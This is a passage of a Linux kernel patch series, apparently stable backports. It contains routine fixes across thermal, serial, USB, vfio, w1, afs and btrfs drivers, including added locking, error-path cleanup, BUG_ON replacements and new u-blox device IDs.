+-	clk_disable_unprepare(tmdev->mod_clk);
+-bus_disable:
+-	clk_disable_unprepare(tmdev->bus_clk);
+-assert_reset:
+-	reset_control_assert(tmdev->reset);
+-
+-	return ret;
+ }
+ 
+ static int sun8i_h3_thermal_init(struct ths_device *tmdev)
+@@ -530,17 +523,6 @@ static int sun8i_ths_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int sun8i_ths_remove(struct platform_device *pdev)
+-{
+-	struct ths_device *tmdev = platform_get_drvdata(pdev);
+-
+-	clk_disable_unprepare(tmdev->mod_clk);
+-	clk_disable_unprepare(tmdev->bus_clk);
+-	reset_control_assert(tmdev->reset);
+-
+-	return 0;
+-}
+-
+ static const struct ths_thermal_chip sun8i_a83t_ths = {
+ 	.sensor_num = 3,
+ 	.scale = 705,
+@@ -642,7 +624,6 @@ MODULE_DEVICE_TABLE(of, of_ths_match);
+ 
+ static struct platform_driver ths_driver = {
+ 	.probe = sun8i_ths_probe,
+-	.remove = sun8i_ths_remove,
+ 	.driver = {
+ 		.name = "sun8i-thermal",
+ 		.of_match_table = of_ths_match,
+diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c
+index 3f33014022f0e..adc85e250822c 100644
+--- a/drivers/tty/serial/8250/8250_omap.c
++++ b/drivers/tty/serial/8250/8250_omap.c
+@@ -639,6 +639,8 @@ static irqreturn_t omap8250_irq(int irq, void *dev_id)
+ 	if ((lsr & UART_LSR_OE) && up->overrun_backoff_time_ms > 0) {
+ 		unsigned long delay;
+ 
++		/* Synchronize UART_IER access against the console. */
++		spin_lock(&port->lock);
+ 		up->ier = port->serial_in(port, UART_IER);
+ 		if (up->ier & (UART_IER_RLSI | UART_IER_RDI)) {
+ 			port->ops->stop_rx(port);
+@@ -648,6 +650,7 @@ static irqreturn_t omap8250_irq(int irq, void *dev_id)
+ 			 */
+ 			cancel_delayed_work(&up->overrun_backoff);
+ 		}
++		spin_unlock(&port->lock);
+ 
+ 		delay = msecs_to_jiffies(up->overrun_backoff_time_ms);
+ 		schedule_delayed_work(&up->overrun_backoff, delay);
+@@ -1453,7 +1456,9 @@ static int omap8250_probe(struct platform_device *pdev)
+ err:
+ 	pm_runtime_dont_use_autosuspend(&pdev->dev);
+ 	pm_runtime_put_sync(&pdev->dev);
++	flush_work(&priv->qos_work);
+ 	pm_runtime_disable(&pdev->dev);
++	cpu_latency_qos_remove_request(&priv->pm_qos_request);
+ 	return ret;
+ }
+ 
+@@ -1500,25 +1505,35 @@ static int omap8250_suspend(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+ 	struct uart_8250_port *up = serial8250_get_port(priv->line);
++	int err;
+ 
+ 	serial8250_suspend_port(priv->line);
+ 
+-	pm_runtime_get_sync(dev);
++	err = pm_runtime_resume_and_get(dev);
++	if (err)
++		return err;
+ 	if (!device_may_wakeup(dev))
+ 		priv->wer = 0;
+ 	serial_out(up, UART_OMAP_WER, priv->wer);
+-	pm_runtime_mark_last_busy(dev);
+-	pm_runtime_put_autosuspend(dev);
+-
++	err = pm_runtime_force_suspend(dev);
+ 	flush_work(&priv->qos_work);
+-	return 0;
++
++	return err;
+ }
+ 
+ static int omap8250_resume(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
++	int err;
+ 
++	err = pm_runtime_force_resume(dev);
++	if (err)
++		return err;
+ 	serial8250_resume_port(priv->line);
++	/* Paired with pm_runtime_resume_and_get() in omap8250_suspend() */
++	pm_runtime_mark_last_busy(dev);
++	pm_runtime_put_autosuspend(dev);
++
+ 	return 0;
+ }
+ #else
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 1093c74b52840..f6d0ea2c6be4b 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -2627,6 +2627,7 @@ OF_EARLYCON_DECLARE(lpuart, "fsl,vf610-lpuart", lpuart_early_console_setup);
+ OF_EARLYCON_DECLARE(lpuart32, "fsl,ls1021a-lpuart", lpuart32_early_console_setup);
+ OF_EARLYCON_DECLARE(lpuart32, "fsl,ls1028a-lpuart", ls1028a_early_console_setup);
+ OF_EARLYCON_DECLARE(lpuart32, "fsl,imx7ulp-lpuart", lpuart32_imx_early_console_setup);
++OF_EARLYCON_DECLARE(lpuart32, "fsl,imx8ulp-lpuart", lpuart32_imx_early_console_setup);
+ OF_EARLYCON_DECLARE(lpuart32, "fsl,imx8qxp-lpuart", lpuart32_imx_early_console_setup);
+ OF_EARLYCON_DECLARE(lpuart32, "fsl,imxrt1050-lpuart", lpuart32_imx_early_console_setup);
+ EARLYCON_DECLARE(lpuart, lpuart_early_console_setup);
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index 23a7ab0de4445..2cc5c68c8689f 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -2334,8 +2334,11 @@ int uart_suspend_port(struct uart_driver *drv, struct uart_port *uport)
+ 	 * able to Re-start_rx later.
+ 	 */
+ 	if (!console_suspend_enabled && uart_console(uport)) {
+-		if (uport->ops->start_rx)
++		if (uport->ops->start_rx) {
++			spin_lock_irq(&uport->lock);
+ 			uport->ops->stop_rx(uport);
++			spin_unlock_irq(&uport->lock);
++		}
+ 		goto unlock;
+ 	}
+ 
+@@ -2428,8 +2431,11 @@ int uart_resume_port(struct uart_driver *drv, struct uart_port *uport)
+ 		if (console_suspend_enabled)
+ 			uart_change_pm(state, UART_PM_STATE_ON);
+ 		uport->ops->set_termios(uport, &termios, NULL);
+-		if (!console_suspend_enabled && uport->ops->start_rx)
++		if (!console_suspend_enabled && uport->ops->start_rx) {
++			spin_lock_irq(&uport->lock);
+ 			uport->ops->start_rx(uport);
++			spin_unlock_irq(&uport->lock);
++		}
+ 		if (console_suspend_enabled)
+ 			console_start(uport->cons);
+ 	}
+diff --git a/drivers/usb/core/devio.c b/drivers/usb/core/devio.c
+index 984de3f5e8eb9..4184cd65a6aac 100644
+--- a/drivers/usb/core/devio.c
++++ b/drivers/usb/core/devio.c
+@@ -747,6 +747,7 @@ static int driver_resume(struct usb_interface *intf)
+ 	return 0;
+ }
+ 
++#ifdef CONFIG_PM
+ /* The following routines apply to the entire device, not interfaces */
+ void usbfs_notify_suspend(struct usb_device *udev)
+ {
+@@ -765,6 +766,7 @@ void usbfs_notify_resume(struct usb_device *udev)
+ 	}
+ 	mutex_unlock(&usbfs_mutex);
+ }
++#endif
+ 
+ struct usb_driver usbfs_driver = {
+ 	.name =		"usbfs",
+diff --git a/drivers/usb/dwc2/platform.c b/drivers/usb/dwc2/platform.c
+index 0c02ef7628fd5..58f53faab340f 100644
+--- a/drivers/usb/dwc2/platform.c
++++ b/drivers/usb/dwc2/platform.c
+@@ -175,6 +175,11 @@ int dwc2_lowlevel_hw_disable(struct dwc2_hsotg *hsotg)
+ 	return ret;
+ }
+ 
++static void dwc2_reset_control_assert(void *data)
++{
++	reset_control_assert(data);
++}
++
+ static int dwc2_lowlevel_hw_init(struct dwc2_hsotg *hsotg)
+ {
+ 	int i, ret;
+@@ -185,6 +190,10 @@ static int dwc2_lowlevel_hw_init(struct dwc2_hsotg *hsotg)
+ 				     "error getting reset control\n");
+ 
+ 	reset_control_deassert(hsotg->reset);
++	ret = devm_add_action_or_reset(hsotg->dev, dwc2_reset_control_assert,
++				       hsotg->reset);
++	if (ret)
++		return ret;
+ 
+ 	hsotg->reset_ecc = devm_reset_control_get_optional(hsotg->dev, "dwc2-ecc");
+ 	if (IS_ERR(hsotg->reset_ecc))
+@@ -192,6 +201,10 @@ static int dwc2_lowlevel_hw_init(struct dwc2_hsotg *hsotg)
+ 				     "error getting reset control for ecc\n");
+ 
+ 	reset_control_deassert(hsotg->reset_ecc);
++	ret = devm_add_action_or_reset(hsotg->dev, dwc2_reset_control_assert,
++				       hsotg->reset_ecc);
++	if (ret)
++		return ret;
+ 
+ 	/*
+ 	 * Attempt to find a generic PHY, then look for an old style
+@@ -306,10 +319,7 @@ static int dwc2_driver_remove(struct platform_device *dev)
+ 	if (hsotg->ll_hw_enabled)
+ 		dwc2_lowlevel_hw_disable(hsotg);
+ 
+-	reset_control_assert(hsotg->reset);
+-	reset_control_assert(hsotg->reset_ecc);
+-
+-	return ret;
++	return 0;
+ }
+ 
+ /**
+diff --git a/drivers/usb/dwc3/dwc3-meson-g12a.c b/drivers/usb/dwc3/dwc3-meson-g12a.c
+index b282ad0e69c6d..eaea944ebd2ce 100644
+--- a/drivers/usb/dwc3/dwc3-meson-g12a.c
++++ b/drivers/usb/dwc3/dwc3-meson-g12a.c
+@@ -805,7 +805,7 @@ static int dwc3_meson_g12a_probe(struct platform_device *pdev)
+ 
+ 	ret = dwc3_meson_g12a_otg_init(pdev, priv);
+ 	if (ret)
+-		goto err_phys_power;
++		goto err_plat_depopulate;
+ 
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+@@ -813,6 +813,9 @@ static int dwc3_meson_g12a_probe(struct platform_device *pdev)
+ 
+ 	return 0;
+ 
++err_plat_depopulate:
++	of_platform_depopulate(dev);
++
+ err_phys_power:
+ 	for (i = 0 ; i < PHY_COUNT ; ++i)
+ 		phy_power_off(priv->phys[i]);
+diff --git a/drivers/usb/dwc3/dwc3-qcom.c b/drivers/usb/dwc3/dwc3-qcom.c
+index 79b22abf97276..72c22851d7eef 100644
+--- a/drivers/usb/dwc3/dwc3-qcom.c
++++ b/drivers/usb/dwc3/dwc3-qcom.c
+@@ -800,6 +800,7 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 	struct device		*dev = &pdev->dev;
+ 	struct dwc3_qcom	*qcom;
+ 	struct resource		*res, *parent_res = NULL;
++	struct resource		local_res;
+ 	int			ret, i;
+ 	bool			ignore_pipe_clk;
+ 	bool			wakeup_source;
+@@ -851,9 +852,8 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 	if (np) {
+ 		parent_res = res;
+ 	} else {
+-		parent_res = kmemdup(res, sizeof(struct resource), GFP_KERNEL);
+-		if (!parent_res)
+-			return -ENOMEM;
++		memcpy(&local_res, res, sizeof(struct resource));
++		parent_res = &local_res;
+ 
+ 		parent_res->start = res->start +
+ 			qcom->acpi_pdata->qscratch_base_offset;
+@@ -865,9 +865,10 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 			if (IS_ERR_OR_NULL(qcom->urs_usb)) {
+ 				dev_err(dev, "failed to create URS USB platdev\n");
+ 				if (!qcom->urs_usb)
+-					return -ENODEV;
++					ret = -ENODEV;
+ 				else
+-					return PTR_ERR(qcom->urs_usb);
++					ret = PTR_ERR(qcom->urs_usb);
++				goto clk_disable;
+ 			}
+ 		}
+ 	}
+@@ -950,11 +951,15 @@ reset_assert:
+ static int dwc3_qcom_remove(struct platform_device *pdev)
+ {
+ 	struct dwc3_qcom *qcom = platform_get_drvdata(pdev);
++	struct device_node *np = pdev->dev.of_node;
+ 	struct device *dev = &pdev->dev;
+ 	int i;
+ 
+ 	device_remove_software_node(&qcom->dwc3->dev);
+-	of_platform_depopulate(dev);
++	if (np)
++		of_platform_depopulate(&pdev->dev);
++	else
++		platform_device_put(pdev);
+ 
+ 	for (i = qcom->num_clocks - 1; i >= 0; i--) {
+ 		clk_disable_unprepare(qcom->clks[i]);
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 7e94d31687e9e..c3590a0c42035 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2631,7 +2631,9 @@ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+ 	ret = pm_runtime_get_sync(dwc->dev);
+ 	if (!ret || ret < 0) {
+ 		pm_runtime_put(dwc->dev);
+-		return 0;
++		if (ret < 0)
++			pm_runtime_set_suspended(dwc->dev);
++		return ret;
+ 	}
+ 
+ 	if (dwc->pullups_connected == is_on) {
+diff --git a/drivers/usb/gadget/function/u_serial.c b/drivers/usb/gadget/function/u_serial.c
+index db6fd0238d4b4..ea2c5b6cde8cd 100644
+--- a/drivers/usb/gadget/function/u_serial.c
++++ b/drivers/usb/gadget/function/u_serial.c
+@@ -1419,10 +1419,19 @@ EXPORT_SYMBOL_GPL(gserial_disconnect);
+ 
+ void gserial_suspend(struct gserial *gser)
+ {
+-	struct gs_port	*port = gser->ioport;
++	struct gs_port	*port;
+ 	unsigned long	flags;
+ 
+-	spin_lock_irqsave(&port->port_lock, flags);
++	spin_lock_irqsave(&serial_port_lock, flags);
++	port = gser->ioport;
++
++	if (!port) {
++		spin_unlock_irqrestore(&serial_port_lock, flags);
++		return;
++	}
++
++	spin_lock(&port->port_lock);
++	spin_unlock(&serial_port_lock);
+ 	port->suspended = true;
+ 	spin_unlock_irqrestore(&port->port_lock, flags);
+ }
+diff --git a/drivers/usb/phy/phy-tahvo.c b/drivers/usb/phy/phy-tahvo.c
+index f2d2cc586c5b7..da63d7e4d2709 100644
+--- a/drivers/usb/phy/phy-tahvo.c
++++ b/drivers/usb/phy/phy-tahvo.c
+@@ -391,7 +391,7 @@ static int tahvo_usb_probe(struct platform_device *pdev)
+ 
+ 	tu->irq = ret = platform_get_irq(pdev, 0);
+ 	if (ret < 0)
+-		return ret;
++		goto err_remove_phy;
+ 	ret = request_threaded_irq(tu->irq, NULL, tahvo_usb_vbus_interrupt,
+ 				   IRQF_ONESHOT,
+ 				   "tahvo-vbus", tu);
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index e12fec4c2e2f2..6692440c1e0a3 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -1151,6 +1151,10 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE(QUALCOMM_VENDOR_ID, 0x90fa),
+ 	  .driver_info = RSVD(3) },
+ 	/* u-blox products */
++	{ USB_DEVICE(UBLOX_VENDOR_ID, 0x1311) },	/* u-blox LARA-R6 01B */
++	{ USB_DEVICE(UBLOX_VENDOR_ID, 0x1312),		/* u-blox LARA-R6 01B (RMNET) */
++	  .driver_info = RSVD(4) },
++	{ USB_DEVICE_INTERFACE_CLASS(UBLOX_VENDOR_ID, 0x1313, 0xff) },	/* u-blox LARA-R6 01B (ECM) */
+ 	{ USB_DEVICE(UBLOX_VENDOR_ID, 0x1341) },	/* u-blox LARA-L6 */
+ 	{ USB_DEVICE(UBLOX_VENDOR_ID, 0x1342),		/* u-blox LARA-L6 (RMNET) */
+ 	  .driver_info = RSVD(4) },
+diff --git a/drivers/usb/typec/ucsi/psy.c b/drivers/usb/typec/ucsi/psy.c
+index 56bf56517f75a..384b42267f1fc 100644
+--- a/drivers/usb/typec/ucsi/psy.c
++++ b/drivers/usb/typec/ucsi/psy.c
+@@ -27,8 +27,20 @@ static enum power_supply_property ucsi_psy_props[] = {
+ 	POWER_SUPPLY_PROP_VOLTAGE_NOW,
+ 	POWER_SUPPLY_PROP_CURRENT_MAX,
+ 	POWER_SUPPLY_PROP_CURRENT_NOW,
++	POWER_SUPPLY_PROP_SCOPE,
+ };
+ 
++static int ucsi_psy_get_scope(struct ucsi_connector *con,
++			      union power_supply_propval *val)
++{
++	u8 scope = POWER_SUPPLY_SCOPE_UNKNOWN;
++	struct device *dev = con->ucsi->dev;
++
++	device_property_read_u8(dev, "scope", &scope);
++	val->intval = scope;
++	return 0;
++}
++
+ static int ucsi_psy_get_online(struct ucsi_connector *con,
+ 			       union power_supply_propval *val)
+ {
+@@ -194,6 +206,8 @@ static int ucsi_psy_get_prop(struct power_supply *psy,
+ 		return ucsi_psy_get_current_max(con, val);
+ 	case POWER_SUPPLY_PROP_CURRENT_NOW:
+ 		return ucsi_psy_get_current_now(con, val);
++	case POWER_SUPPLY_PROP_SCOPE:
++		return ucsi_psy_get_scope(con, val);
+ 	default:
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/vfio/mdev/mdev_core.c b/drivers/vfio/mdev/mdev_core.c
+index 58f91b3bd670c..ed4737de45289 100644
+--- a/drivers/vfio/mdev/mdev_core.c
++++ b/drivers/vfio/mdev/mdev_core.c
+@@ -72,12 +72,6 @@ int mdev_register_parent(struct mdev_parent *parent, struct device *dev,
+ 	parent->nr_types = nr_types;
+ 	atomic_set(&parent->available_instances, mdev_driver->max_instances);
+ 
+-	if (!mdev_bus_compat_class) {
+-		mdev_bus_compat_class = class_compat_register("mdev_bus");
+-		if (!mdev_bus_compat_class)
+-			return -ENOMEM;
+-	}
+-
+ 	ret = parent_create_sysfs_files(parent);
+ 	if (ret)
+ 		return ret;
+@@ -251,13 +245,24 @@ int mdev_device_remove(struct mdev_device *mdev)
+ 
+ static int __init mdev_init(void)
+ {
+-	return bus_register(&mdev_bus_type);
++	int ret;
++
++	ret = bus_register(&mdev_bus_type);
++	if (ret)
++		return ret;
++
++	mdev_bus_compat_class = class_compat_register("mdev_bus");
++	if (!mdev_bus_compat_class) {
++		bus_unregister(&mdev_bus_type);
++		return -ENOMEM;
++	}
++
++	return 0;
+ }
+ 
+ static void __exit mdev_exit(void)
+ {
+-	if (mdev_bus_compat_class)
+-		class_compat_unregister(mdev_bus_compat_class);
++	class_compat_unregister(mdev_bus_compat_class);
+ 	bus_unregister(&mdev_bus_type);
+ }
+ 
+diff --git a/drivers/video/fbdev/omap/lcd_mipid.c b/drivers/video/fbdev/omap/lcd_mipid.c
+index 03cff39d392db..cc1079aad61f2 100644
+--- a/drivers/video/fbdev/omap/lcd_mipid.c
++++ b/drivers/video/fbdev/omap/lcd_mipid.c
+@@ -563,11 +563,15 @@ static int mipid_spi_probe(struct spi_device *spi)
+ 
+ 	r = mipid_detect(md);
+ 	if (r < 0)
+-		return r;
++		goto free_md;
+ 
+ 	omapfb_register_panel(&md->panel);
+ 
+ 	return 0;
++
++free_md:
++	kfree(md);
++	return r;
+ }
+ 
+ static void mipid_spi_remove(struct spi_device *spi)
+diff --git a/drivers/virt/coco/sev-guest/Kconfig b/drivers/virt/coco/sev-guest/Kconfig
+index f9db0799ae67c..da2d7ca531f0f 100644
+--- a/drivers/virt/coco/sev-guest/Kconfig
++++ b/drivers/virt/coco/sev-guest/Kconfig
+@@ -2,6 +2,7 @@ config SEV_GUEST
+ 	tristate "AMD SEV Guest driver"
+ 	default m
+ 	depends on AMD_MEM_ENCRYPT
++	select CRYPTO
+ 	select CRYPTO_AEAD2
+ 	select CRYPTO_GCM
+ 	help
+diff --git a/drivers/w1/slaves/w1_therm.c b/drivers/w1/slaves/w1_therm.c
+index 067692626cf07..99c58bd9d2df0 100644
+--- a/drivers/w1/slaves/w1_therm.c
++++ b/drivers/w1/slaves/w1_therm.c
+@@ -1159,29 +1159,26 @@ static int convert_t(struct w1_slave *sl, struct therm_info *info)
+ 
+ 			w1_write_8(dev_master, W1_CONVERT_TEMP);
+ 
+-			if (strong_pullup) { /*some device need pullup */
++			if (SLAVE_FEATURES(sl) & W1_THERM_POLL_COMPLETION) {
++				ret = w1_poll_completion(dev_master, W1_POLL_CONVERT_TEMP);
++				if (ret) {
++					dev_dbg(&sl->dev, "%s: Timeout\n", __func__);
++					goto mt_unlock;
++				}
++				mutex_unlock(&dev_master->bus_mutex);
++			} else if (!strong_pullup) { /*no device need pullup */
+ 				sleep_rem = msleep_interruptible(t_conv);
+ 				if (sleep_rem != 0) {
+ 					ret = -EINTR;
+ 					goto mt_unlock;
+ 				}
+ 				mutex_unlock(&dev_master->bus_mutex);
+-			} else { /*no device need pullup */
+-				if (SLAVE_FEATURES(sl) & W1_THERM_POLL_COMPLETION) {
+-					ret = w1_poll_completion(dev_master, W1_POLL_CONVERT_TEMP);
+-					if (ret) {
+-						dev_dbg(&sl->dev, "%s: Timeout\n", __func__);
+-						goto mt_unlock;
+-					}
+-					mutex_unlock(&dev_master->bus_mutex);
+-				} else {
+-					/* Fixed delay */
+-					mutex_unlock(&dev_master->bus_mutex);
+-					sleep_rem = msleep_interruptible(t_conv);
+-					if (sleep_rem != 0) {
+-						ret = -EINTR;
+-						goto dec_refcnt;
+-					}
++			} else { /*some device need pullup */
++				mutex_unlock(&dev_master->bus_mutex);
++				sleep_rem = msleep_interruptible(t_conv);
++				if (sleep_rem != 0) {
++					ret = -EINTR;
++					goto dec_refcnt;
+ 				}
+ 			}
+ 			ret = read_scratchpad(sl, info);
+diff --git a/drivers/w1/w1.c b/drivers/w1/w1.c
+index 4a2ddf730a3ac..2eee26b7fc4a3 100644
+--- a/drivers/w1/w1.c
++++ b/drivers/w1/w1.c
+@@ -1263,10 +1263,10 @@ err_out_exit_init:
+ 
+ static void __exit w1_fini(void)
+ {
+-	struct w1_master *dev;
++	struct w1_master *dev, *n;
+ 
+ 	/* Set netlink removal messages and some cleanup */
+-	list_for_each_entry(dev, &w1_masters, w1_master_entry)
++	list_for_each_entry_safe(dev, n, &w1_masters, w1_master_entry)
+ 		__w1_remove_master_device(dev);
+ 
+ 	w1_fini_netlink();
+diff --git a/fs/afs/write.c b/fs/afs/write.c
+index 08fd456dde67c..3ecc212b62099 100644
+--- a/fs/afs/write.c
++++ b/fs/afs/write.c
+@@ -381,17 +381,19 @@ static int afs_store_data(struct afs_vnode *vnode, struct iov_iter *iter, loff_t
+ 	afs_op_set_vnode(op, 0, vnode);
+ 	op->file[0].dv_delta = 1;
+ 	op->file[0].modification = true;
+-	op->store.write_iter = iter;
+ 	op->store.pos = pos;
+ 	op->store.size = size;
+-	op->store.i_size = max(pos + size, vnode->netfs.remote_i_size);
+ 	op->store.laundering = laundering;
+-	op->mtime = vnode->netfs.inode.i_mtime;
+ 	op->flags |= AFS_OPERATION_UNINTR;
+ 	op->ops = &afs_store_data_operation;
+ 
+ try_next_key:
+ 	afs_begin_vnode_operation(op);
++
++	op->store.write_iter = iter;
++	op->store.i_size = max(pos + size, vnode->netfs.remote_i_size);
++	op->mtime = vnode->netfs.inode.i_mtime;
++
+ 	afs_wait_for_operation(op);
+ 
+ 	switch (op->error) {
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 74a5c94898b0f..30b264eb9d209 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -79,14 +79,21 @@ static u64 btrfs_reduce_alloc_profile(struct btrfs_fs_info *fs_info, u64 flags)
+ 	}
+ 	allowed &= flags;
+ 
+-	if (allowed & BTRFS_BLOCK_GROUP_RAID6)
++	/* Select the highest-redundancy RAID level. */
++	if (allowed & BTRFS_BLOCK_GROUP_RAID1C4)
++		allowed = BTRFS_BLOCK_GROUP_RAID1C4;
++	else if (allowed & BTRFS_BLOCK_GROUP_RAID6)
+ 		allowed = BTRFS_BLOCK_GROUP_RAID6;
++	else if (allowed & BTRFS_BLOCK_GROUP_RAID1C3)
++		allowed = BTRFS_BLOCK_GROUP_RAID1C3;
+ 	else if (allowed & BTRFS_BLOCK_GROUP_RAID5)
+ 		allowed = BTRFS_BLOCK_GROUP_RAID5;
+ 	else if (allowed & BTRFS_BLOCK_GROUP_RAID10)
+ 		allowed = BTRFS_BLOCK_GROUP_RAID10;
+ 	else if (allowed & BTRFS_BLOCK_GROUP_RAID1)
+ 		allowed = BTRFS_BLOCK_GROUP_RAID1;
++	else if (allowed & BTRFS_BLOCK_GROUP_DUP)
++		allowed = BTRFS_BLOCK_GROUP_DUP;
+ 	else if (allowed & BTRFS_BLOCK_GROUP_RAID0)
+ 		allowed = BTRFS_BLOCK_GROUP_RAID0;
+ 
+@@ -1596,8 +1603,15 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 		}
+ 		spin_unlock(&bg->lock);
+ 
+-		/* Get out fast, in case we're unmounting the filesystem */
+-		if (btrfs_fs_closing(fs_info)) {
++		/*
++		 * Get out fast, in case we're read-only or unmounting the
++		 * filesystem. It is OK to drop block groups from the list even
++		 * for the read-only case. As we did sb_start_write(),
++		 * "mount -o remount,ro" won't happen and read-only filesystem
++		 * means it is forced read-only due to a fatal error. So, it
++		 * never gets back to read-write to let us reclaim again.
++		 */
++		if (btrfs_need_cleaner_sleep(fs_info)) {
+ 			up_write(&space_info->groups_sem);
+ 			goto next;
+ 		}
+@@ -1628,11 +1642,27 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 		}
+ 
+ next:
++		if (ret)
++			btrfs_mark_bg_to_reclaim(bg);
+ 		btrfs_put_block_group(bg);
++
++		mutex_unlock(&fs_info->reclaim_bgs_lock);
++		/*
++		 * Reclaiming all the block groups in the list can take really
++		 * long.  Prioritize cleaning up unused block groups.
++		 */
++		btrfs_delete_unused_bgs(fs_info);
++		/*
++		 * If we are interrupted by a balance, we can just bail out. The
++		 * cleaner thread restart again if necessary.
++		 */
++		if (!mutex_trylock(&fs_info->reclaim_bgs_lock))
++			goto end;
+ 		spin_lock(&fs_info->unused_bgs_lock);
+ 	}
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ 	mutex_unlock(&fs_info->reclaim_bgs_lock);
++end:
+ 	btrfs_exclop_finish(fs_info);
+ 	sb_end_write(fs_info->sb);
+ }
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index ab9f8d6c4f1b9..1a327eb3580b4 100644
+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -475,9 +475,14 @@ static noinline int __btrfs_cow_block(struct btrfs_trans_handle *trans,
+ 		    btrfs_header_backref_rev(buf) < BTRFS_MIXED_BACKREF_REV)
+ 			parent_start = buf->start;
+ 
+-		atomic_inc(&cow->refs);
+ 		ret = btrfs_tree_mod_log_insert_root(root->node, cow, true);
+-		BUG_ON(ret < 0);
++		if (ret < 0) {
++			btrfs_tree_unlock(cow);
++			free_extent_buffer(cow);
++			btrfs_abort_transaction(trans, ret);
++			return ret;
++		}
++		atomic_inc(&cow->refs);
+ 		rcu_assign_pointer(root->node, cow);
+ 
+ 		btrfs_free_tree_block(trans, btrfs_root_id(root), buf,
+@@ -935,7 +940,12 @@ static noinline int balance_level(struct btrfs_trans_handle *trans,
+ 		}
+ 
+ 		ret = btrfs_tree_mod_log_insert_root(root->node, child, true);
+-		BUG_ON(ret < 0);
++		if (ret < 0) {
++			btrfs_tree_unlock(child);
++			free_extent_buffer(child);
++			btrfs_abort_transaction(trans, ret);
++			goto enospc;
++		}
+ 		rcu_assign_pointer(root->node, child);
+ 
+ 		add_root_to_dirty_list(root);
+@@ -1017,7 +1027,10 @@ static noinline int balance_level(struct btrfs_trans_handle *trans,
+ 			btrfs_node_key(right, &right_key, 0);
+ 			ret = btrfs_tree_mod_log_insert_key(parent, pslot + 1,
+ 					BTRFS_MOD_LOG_KEY_REPLACE, GFP_NOFS);
+-			BUG_ON(ret < 0);
++			if (ret < 0) {
++				btrfs_abort_transaction(trans, ret);
++				goto enospc;
++			}
+ 			btrfs_set_node_key(parent, &right_key, pslot + 1);
+ 			btrfs_mark_buffer_dirty(parent);
+ 		}
+@@ -1063,7 +1076,10 @@ static noinline int balance_level(struct btrfs_trans_handle *trans,
+ 		btrfs_node_key(mid, &mid_key, 0);
+ 		ret = btrfs_tree_mod_log_insert_key(parent, pslot,
+ 				BTRFS_MOD_LOG_KEY_REPLACE, GFP_NOFS);
+-		BUG_ON(ret < 0);
++		if (ret < 0) {
++			btrfs_abort_transaction(trans, ret);
++			goto enospc;
++		}
+ 		btrfs_set_node_key(parent, &mid_key, pslot);
+ 		btrfs_mark_buffer_dirty(parent);
+ 	}
+@@ -2850,6 +2866,8 @@ static noinline int split_node(struct btrfs_trans_handle *trans,
+ 
+ 	ret = btrfs_tree_mod_log_eb_copy(split, c, 0, mid, c_nritems - mid);
+ 	if (ret) {
++		btrfs_tree_unlock(split);
++		free_extent_buffer(split);
+ 		btrfs_abort_transaction(trans, ret);
+ 		return ret;
+ 	}
+diff --git a/fs/btrfs/free-space-tree.c b/fs/btrfs/free-space-tree.c
+index e040eea3937d7..a07450f64abb1 100644
+--- a/fs/btrfs/free-space-tree.c
++++ b/fs/btrfs/free-space-tree.c
+@@ -1275,7 +1275,10 @@ int btrfs_delete_free_space_tree(struct btrfs_fs_info *fs_info)
+ 		goto abort;
+ 
+ 	btrfs_global_root_delete(free_space_root);
++
++	spin_lock(&fs_info->trans_lock);
+ 	list_del(&free_space_root->dirty_list);
++	spin_unlock(&fs_info->trans_lock);
+ 
+ 	btrfs_tree_lock(free_space_root->node);
+ 	btrfs_clean_tree_block(free_space_root->node);
+diff --git a/fs/btrfs/locking.c b/fs/btrfs/locking.c
+index 0eab3cb274a18..df98e64d7dc67 100644
+--- a/fs/btrfs/locking.c
++++ b/fs/btrfs/locking.c
+@@ -56,8 +56,8 @@
+ 
+ static struct btrfs_lockdep_keyset {
+ 	u64			id;		/* root objectid */
+-	/* Longest entry: btrfs-free-space-00 */
+-	char			names[BTRFS_MAX_LEVEL][20];
++	/* Longest entry: btrfs-block-group-00 */
++	char			names[BTRFS_MAX_LEVEL][24];
+ 	struct lock_class_key	keys[BTRFS_MAX_LEVEL];
+ } btrfs_lockdep_keysets[] = {
+ 	{ .id = BTRFS_ROOT_TREE_OBJECTID,	DEFINE_NAME("root")	},
+@@ -71,6 +71,7 @@ static struct btrfs_lockdep_keyset {
+ 	{ .id = BTRFS_DATA_RELOC_TREE_OBJECTID,	DEFINE_NAME("dreloc")	},
+ 	{ .id = BTRFS_UUID_TREE_OBJECTID,	DEFINE_NAME("uuid")	},
+ 	{ .id = BTRFS_FREE_SPACE_TREE_OBJECTID,	DEFINE_NAME("free-space") },
++	{ .id = BTRFS_BLOCK_GROUP_TREE_OBJECTID, DEFINE_NAME("block-group") },
+ 	{ .id = 0,				DEFINE_NAME("tree")	},
